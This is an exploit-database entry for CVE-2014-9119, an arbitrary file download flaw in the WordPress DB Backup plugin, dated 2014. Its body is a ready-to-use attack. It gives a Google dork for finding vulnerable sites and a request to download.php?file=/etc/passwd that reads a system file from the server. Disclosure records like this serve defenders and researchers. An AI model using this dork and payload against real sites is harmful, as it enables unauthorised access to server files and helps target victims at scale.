EXPLOITS

WordPress Plugin DB Backup - Arbitrary File Download

Author: Ashiyane Digital Security Team
type: webapps
platform: php
port: 80.0
date_added: 2014-11-26  
date_updated: 2014-12-03  
verified: 1  
codes: CVE-2014-9119;OSVDB-116245  
tags: WordPress Plugin  
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comdb-backup.4.5.zip  

raw file: 35378.txt  

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress db-backup plugin File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/plugins/db-backup/
|
|[*] Date : Date: 2014-11-26
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : https://wordpress.org/plugins/wp-database-backup/
|
|[*] Plugin Link : https://downloads.wordpress.org/plugin/wp-database-backup.zip
|
|[*] Tested on: Windows 7
|
|[*] Discovered By : ACC3SS
|
|-------------------------------------------------------------------------|
|
|[*] Location :[localhost]/wp-content/plugins/db-backup/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|
|
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|